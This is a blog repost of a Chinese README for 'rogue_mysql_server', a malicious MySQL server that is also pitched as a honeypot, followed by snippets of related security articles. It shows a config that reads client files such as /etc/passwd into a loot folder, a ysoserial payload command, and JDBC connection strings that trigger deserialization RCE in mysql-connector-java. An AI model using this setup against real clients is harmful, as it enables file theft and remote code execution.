rogue_mysql_server,GitHub - simlelcf/rogue_mysql_server: 一个支持 go, php, python, java, 原生命令行等多种语言下客户端的...

最新推荐文章于 2024-04-18 09:54:48 发布
最新推荐文章于 2024-04-18 09:54:48 发布
阅读量591 收藏
点赞数
文章标签: rogue_mysql_server

Rogue Mysql Server

基于 https://github.com/vitessio/vitess 实现的恶意 mysql 服务器, 支持 go, php, python, java, 原生命令行等多种语言下的多种库的 mysql 客户端.

远离恼人的兼容性问题, 测试过的客户端见下表

language

library

pass

go

github.com/go-sql-driver/mysql

✔️

php

mysqli, pdo

✔️

python

pymysql

✔️

java

mysql-connector-java

✔️

native

10.4.13-MariaDB

✔️

觉得好用可以点右上方的 🌟 支持作者

功能

可以兼容多种 mysql 客户端

可以读取二进制文件

自动保存文件

作为蜜罐使用时, 可选择开启帐号密码验证

读取客户端的 ConnAttr, 可能会包含一些客户端的额外信息

对于 jdbc, 可控链接串的情况下可以利用 mysql-connector-java 反序列化漏洞进行 RCE

配置文件

示例:

host: 0.0.0.0

port: 3306

version_string: "10.4.13-MariaDB-log"

file_list: ["/etc/passwd", "C:/boot.ini"]

save_path: ./loot

always_read: false

auth: true

users:

- root: root

- root: password

host, port 对应监听的 IP 和端口. version_string 对应客户端得到的服务端版本信息.

auth 对应是否开启验证, 如果为 false, 那么不管输什么密码或者不输入密码都可以登录.

如果为 true, 则需要帐号密码匹配下面的设置的帐号密码中的一条.

而 file_list 对应需要读取的文件, 会按照客户端执行语句的顺序读取列表中的文件, 并保存到 save_path 文件夹中.

如果开启 always_read, 那么不管客户端是否标记自己支持 LOAD DATA LOCAL, 都会尝试去读取文件, 否则会根据客户端的标记来决定是否读取, 避免客户端请求不同步.

jdbc 利用相关

与 jdbc 相关的配置如下

jdbc_exploit: false

always_exploit: false

ysoserial_command: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'open -a Calculator']

jdbc_exploit 代表这个功能开启, 在检测到客户端是 mysql-connector-j 的情况下会自动利用.

always_exploit 代表总是开启利用, 优先级比 always_read 高.

ysoserial_command 生成反序列化 payload 的命令.

8.x: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password

6.x: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password

>=5.1.11: jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password

Ref

Air君陈怡帆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
rogue_mysql_server_rogue_mysql_server
weixin_35847422的博客
02-07 1482
cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=github.com/alecthomas/template...
rogue_mysql_server:一个支持go,phppythonjava原生命令行多种语言客户端mysql恶意服务器
03-19
流氓Mysql服务器 基于实现的恶意mysql服务器,支持go,phppythonjava原生命令行多种语言下的多种库的mysql客户端。远离恼人的兼容性问题,测试过的客户端见谅 语言 图书馆 经过 去 github.com/go-sql-driver/mysql :check_mark: PHP mysqli,pdo :check_mark: Python pymysql :check_mark: Java MySQL的连接器的Java :check_mark: 本国的 10.4.13-MariaDB :check_mark: 觉得好用可以点右上方的 :glowing_star:支持作者 功能 可以兼容多种mysql客户端 可以读取二进制文件 自动保存文件 作为蜜罐使用时,替代开启帐号密码验证 阅读客户端的ConnAttr,可能会包含一些客户端的额外信息 对于jdbc,可控链接串的情况下可以利用mysql-connector-java反序列化入侵进行RCE 配置文件 示例:
探索 Rogue MySql Server:一款创新的数据库模拟工具
最新发布
gitblog_00058的博客
04-18 326
探索 Rogue MySql Server:一款创新的数据库模拟工具 项目地址:https://gitcode.com/Gifts/Rogue-MySql-Server Rogue MySql Server一个开源项目,它允许开发者模拟MySQL服务器的行为,用于测试和调试目的。这个项目的目的是帮助我们构建更健壮、更安全的应用程序,通过模拟各种异常场景,使开发人员能够预见到并处理可能出现的问题...
探秘 Rogue MySQL Server:一款强大的数据库模拟工具
gitblog_00003的博客
04-15 1015
探秘 Rogue MySQL Server:一款强大的数据库模拟工具 项目地址:https://gitcode.com/rmb122/rogue_mysql_server 在软件开发中,测试和模拟真实环境往往是一项挑战,尤其是在数据库层面。现在,让我们一起深入探讨一个名为 Rogue MySQL Server 的开源项目,它是一个功能齐全的 MySQL 服务器模拟器,可以帮助开发者在无需实际数据...
蜜罐-mysql任意读取文件
weixin_46164380的博客
03-31 1914
mysql任意读取攻击者的文件 下载源码:https://github.com/allyshka/Rogue-MySql-Server 1.解压:unzip Rogue-MySql-Server-master.zip Ps:没开启蜜罐时的端口。 这是开启蜜罐后的端口 2.直接使用python执行 3.运行之后会生成一个.log文件,里面会显示读取到的内容 4.再次运行python脚...
Python库 | rogue_gym-0.0.1-cp36-cp36m-manylinux1_x86_64.whl
03-24
标题中的"Python库 | rogue_gym-0.0.1-cp36-cp36m-manylinux1_x86_64.whl"表明这是一个针对Python编程语言的第三方库,名为rogue_gym,其版本号为0.0.1。这个库经过打包处理,以whl(Wheel)格式提供,这是一种预...
Rogue-DHCP-Server-Discovery-Tool:发现恶意DHCP服务器(如果有)的Python代码
03-28
在这种背景下,"Rogue-DHCP-Server-Discovery-Tool"是一个用于检测网络中是否存在这类恶意服务器的Python程序。 这个工具的主要功能是通过模拟DHCP客户端请求,监听网络上的DHCP响应,从而识别可能的Rogue DHCP...
rogue_village:我希望另一个类似roguelike的项目能在某个地方进行。
02-21
rogue_village是一个基于Rust编程语言开发的项目,它可能是开发者希望创建的一个roguelike类型的游戏或应用程序。roguelike是一种受经典游戏《Rogue》启发的角色扮演游戏(RPG)子类,以其随机生成的关卡、永久死亡...
探索神秘的Rogue MySql Server一个创新的数据模拟工具
gitblog_00096的博客
04-16 307
探索神秘的Rogue MySql Server一个创新的数据模拟工具 Rogue-MySql-Server项目地址:https://gitcode.com/gh_mirrors/ro/Rogue-MySql-Server 在数据驱动的世界中,测试和开发常常依赖于真实数据库的副本。但是,这些副本可能涉及敏感信息,管理起来也颇为繁琐。幸运的是,项目应运而生,它是一款开源的MySQL服务器模拟器,旨...
项目五linux 内网完整渗透测试实例笔记
qq_56426046的博客
01-29 1797
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。
记一次攻防演练实战总结
渗透测试研究中心
10-14 1903
0x01 外网打点资产发现多测绘平台搜索https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/多语法搜索假如某个目标站点为xxxx.com ,我们可以通过不同的语法进行资产搜集,搜集的资产会更全面这里以fofa为例domain="xxxx.com" host="xxxx.com" header="xxxx.co...
Ysoserial 简单利用
qq_50854662的博客
02-13 863
Ysoserial 简单利用
红队专题-反序列化攻击-Tools-Ysoserial
aming小老弟
01-12 740
利用方式Ysoserial.Net 来⽣成反序列化 payload,再通过调⽤远程⽅法来触发反序列化,实现任意代码执⾏,从⽽导致服务器被接管。payload 举例。
结合suctf-upload labs-RougeMysql再学习
weixin_30376453的博客
08-22 162
这篇主要记录一下这道题目的预期解法 做这道题首先要在自己的vps搭建一个rouge mysql,里面要填写需要读取客户端的文件名,即我们上传的phar文件路径 先搭一个rouge mysql测试看看: #coding=utf-8#python2.x import socket import logging logging.basicConfig(level=loggin...
mysql任意文件读取漏洞学习
BerL1n
09-13 3724
前言 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile '/etc/passwd' into table proc;,从而可以导致mys...
【网络安全】如何搭建MySQL恶意服务器读取文件?
weixin_49298681的博客
01-06 150
注:本文不涉及对MySQL协议报文研究,仅讲解原理,并且做部分演示。搭建MySQL恶意服务器读取文件这件事,虽然直接利用门槛较高,但是由于在网上看到了一种比较新颖的利用方式(利用社会工程学引诱用户连接MySQL进而读取用户文件),个人觉得比较有意思,总结了一下攻击原理以及攻击方式,因此就有了这篇文章。
[红明谷CTF 2021]EasyTP
Sk1y的博客
01-01 2526
[红明谷CTF 2021]EasyTP 文章目录[红明谷CTF 2021]EasyTP解题过程解法1:报错注入解法2:开堆叠写shell解法3:rogue-mysql-server参考链接 解题过程 打开容器 源码泄露/www.zip 下载下来,发现是thinkphp3.2.3的,找链子:ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 (f5.pm) 注意在源码中,控制器中存在反序列化,以这个为入手点 在BUUCTF的环境中,database=test,password
java 漏洞复现_Apache Shiro java反序列化漏洞复现
weixin_42526484的博客
03-02 182
Apache Shiro java反序列化漏洞复现 影响版本Apache Shiro <= 1.2.4环境搭建准备环境攻击机: Windows或者Linux (我用的是windows10 1903)、ysoserial-0.0.6-SNAPSHOT-all.jar、python环境、Java环境**靶机:**带docker的Linux就行靶机环境搭建获取docker镜像docker pull...
MySQL出发的反击之路
gt9000的博客
01-12 436
文章内容 0x00 漏洞原理 几篇参考文章已经将原理说的比较清楚了,问题出在 LOAD DATA INFILE 的地方,该功能是用于读取客户端上的一个文件,并将其内容导入到一张表中。 在 MySQL 连接建立的阶段会有一个必要的步骤,即 客户端和服务端交换各自功能 如果需要则创建SSL通信通道 服务端认证客户端身份 还有一个必要的条件就是 MySQL 协议中,客户端是不会存储自身请求的,而是通过服...
SCA服务构件架构:Java EE集成规范V1.00详解
、Cape Clear Software等公司的共同版权保护,并声明2005年和2007年所有权利保留,且有一个许可条款,规定了规范的使用和分销规则。通过阅读这份文档,开发者能够了解到如何在Java EE平台之上构建和管理服务组件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值